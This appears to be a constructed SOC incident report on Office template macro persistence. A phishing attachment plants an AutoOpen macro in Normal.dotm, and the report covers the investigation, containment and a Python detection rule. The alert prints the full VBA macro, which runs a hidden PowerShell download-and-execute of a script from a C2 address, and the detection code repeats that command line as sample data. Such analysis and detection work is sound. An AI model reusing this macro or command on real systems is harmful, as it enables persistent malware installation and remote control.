Microsoft Defender Alert Details
Alert ID: MD-OFFICE-STARTUP-1137-7842
Alert Time: 2024-02-18 09:30:15 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “Office Application Startup Persistence Detected”
MITRE ATT&CK: T1137.001 – Office Application Startup: Office Template Macros
Alert Details:
Detection: Malicious macro added to Office template for persistence
Host: FIN-WS-078 (Finance Department)
User: bturner (Brian Turner, Accountant)
Time: 09:25 EST
File Details:
Path: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm
Modification Time: 09:20 EST
Original Hash: 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modified By: WINWORD.EXE (PID: 7842)
Macro Analysis:
Macro Name: “AutoOpen”
VBA Code:
Sub AutoOpen()
    ' Runs automatically when Word starts because it lives in the global template
    Dim objShell As Object
    Set objShell = CreateObject("Wscript.Shell")
    ' Downloads a second-stage script and runs it; 0 = hidden window, False = do not wait
    objShell.Run "powershell -WindowStyle Hidden -Command ""Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1""", 0, False
End Sub
Process Tree:
WINWORD.EXE (PID: 7842) – user opened Word
    powershell.exe (PID: 7890) – spawned by macro
        Network connection to 185.143.221[.]89:80
Detection Logic:
Normal.dotm template modified (unusual)
AutoOpen macro added (auto-executes when Word starts)
Macro downloads and runs PowerShell script
Persistence: Every time Word starts, macro executes
Additional Context:
User opened Word document from email attachment
Document contained macro that modified Normal.dotm
SOC Investigation Process
Step | Action | Tools Used | Findings
1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed Normal.dotm modification with malicious macro
2. Macro Analysis | Extract and analyze VBA code | Manual review | AutoOpen macro downloads PowerShell payload
3. Network Check | Check for C2 connections | Zscaler Logs, Firewall | Connection to 185.143.221[.]89:80 successful
4. Immediate Action | Remove malicious macro | PowerShell, Word | Normal.dotm restored from backup
5. Host Isolation | Isolate host | Defender | Host quarantined
6. User Interview | Contact user | Teams, Phone | User opened “invoice.docm” from email
Jira Incident Report
Ticket: SOC-2024-091
Summary: T1137 – Office Template Macro Persistence Installed
Status: RESOLVED
Resolution: MALICIOUS – Persistence Removed
Priority: P2 – MEDIUM
Labels: T1137, office-startup, macro-persistence, defender, phishing
Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Office Application Startup Persistence Detected”.
Host: FIN-WS-078 (Finance Department, user bturner).
File: C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm.
Time: 2024-02-18 09:30 EST.
Technique: MITRE ATT&CK T1137.001 – Office Application Startup: Office Template Macros.
2. Technical Analysis:
Attack Chain:
09:10 – User receives email from “vendor@payment-update[.]net”
09:12 – Email contains attachment “invoice.docm”
09:15 – User opens attachment, enables macros (prompted by document)
09:16 – Macro executes, modifies Normal.dotm template
09:17 – AutoOpen macro added to Normal.dotm
09:18 – Word exits (normal)
09:20 – User restarts Word (for legitimate work)
09:21 – AutoOpen macro triggers, downloads PowerShell
09:22 – PowerShell connects to C2
09:25 – Defender detects template modification
Persistence Mechanism:
File: Normal.dotm (global template for Word)
Macro: AutoOpen (runs automatically when Word starts)
Effect: Every time user opens Word, macro downloads and runs payload
Persistence: Survives reboots; triggers on application start
Macro Analysis:
AutoOpen macro downloads update.ps1 from 185.143.221[.]89
update.ps1 (SHA256: b2c3d4e5…) contains Cobalt Strike beacon
Beacon connects to same C2 on port 443
C2 Communication:
Established at 09:22
Beacon every 60 seconds
No data exfiltration before containment
3. Investigation Findings:
Timeline:
09:10 – Phishing email received
09:15 – User opens attachment
09:16-09:17 – Normal.dotm modified
09:20 – Word restarted (legitimate)
09:21-09:22 – Payload downloaded, C2 connected
09:25 – Defender alert
09:27 – SOC investigates
09:30 – Normal.dotm restored
Indicators of Compromise (IoCs):
Files:
– Normal.dotm (modified) – SHA256: a1b2c3d4…
– invoice.docm (original) – SHA256: b2c3d4e5…
– update.ps1 – SHA256: c3d4e5f6…
Network:
– C2: 185.143.221[.]89:80 (download), :443 (beacon)
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice Overdue”
4. Containment Actions:
Immediate Actions:
Restored Normal.dotm from backup (clean version).
Deleted invoice.docm and update.ps1.
Isolated host via Defender.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
Verified Word functions normally.
No reimage needed.
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User opened malicious document and enabled macros.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office from modifying templates.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Finance workstation offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Normal.dotm restored.
Malware removed.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Set Normal.dotm to read-only via GPO.
Enhanced monitoring for Office template modifications.
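As an added example (not code from the original alert or report), the detection logic in the alert and the enhanced template monitoring above can be expressed as a small Python rule run over constructed endpoint events modelled on this incident's process tree. The event field names, the list of script hosts and the sample events are assumptions made for the example.

```python
import re

# Office parents and script-host children worth pairing in a rule (assumed lists).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Writes to the per-user Word templates folder (Normal.dotm lives here).
TEMPLATE_RE = re.compile(r"\\AppData\\Roaming\\Microsoft\\Templates\\.*\.dot[mx]?$", re.I)
# Command-line fragments seen in the macro's PowerShell launch.
SUSPICIOUS_ARGS = re.compile(
    r"-windowstyle\s+hidden|-executionpolicy\s+bypass|invoke-webrequest|downloadstring", re.I)

# Constructed sample events modelled on the alert (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "FileModified", "image": "WINWORD.EXE", "pid": 7842,
     "path": r"C:\Users\bturner\AppData\Roaming\Microsoft\Templates\Normal.dotm"},
    {"type": "ProcessCreate", "parent_image": "WINWORD.EXE", "parent_pid": 7842,
     "image": "powershell.exe", "pid": 7890,
     "cmdline": 'powershell -WindowStyle Hidden -Command "Invoke-WebRequest '
                '-Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\\update.ps1; '
                'powershell -ExecutionPolicy Bypass -File %temp%\\update.ps1"'},
    # Benign control: PowerShell launched by Explorer, not by an Office app.
    {"type": "ProcessCreate", "parent_image": "explorer.exe", "parent_pid": 1200,
     "image": "powershell.exe", "pid": 4321,
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]


def classify(event):
    """Return a finding dict for one event, or None if it does not match a rule."""
    if (event["type"] == "FileModified"
            and event["image"].lower() in OFFICE_APPS
            and TEMPLATE_RE.search(event["path"])):
        return {"rule": "office-template-modified", "pid": event["pid"],
                "path": event["path"], "flags": []}
    if (event["type"] == "ProcessCreate"
            and event["parent_image"].lower() in OFFICE_APPS
            and event["image"].lower() in SCRIPT_HOSTS):
        flags = sorted({m.lower() for m in SUSPICIOUS_ARGS.findall(event["cmdline"])})
        return {"rule": "office-child-process", "pid": event["pid"],
                "parent_pid": event["parent_pid"], "flags": flags}
    return None


def scan(events):
    """Apply both rules to a list of events and return the findings in order."""
    return [f for f in (classify(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The first rule alone fires on the template write at 09:16 in the attack chain; pairing it with the second rule keyed on the same Office PID gives the parent/child chain the alert's process tree shows.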
8. Conclusion:
A phishing email with a malicious macro modified the user’s Normal.dotm template, installing persistence that triggered every time Word started. Defender detected the template modification, enabling rapid restoration before significant C2 activity occurred.
Closure Rationale: Normal.dotm restored; malware removed; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-18 10:30 EST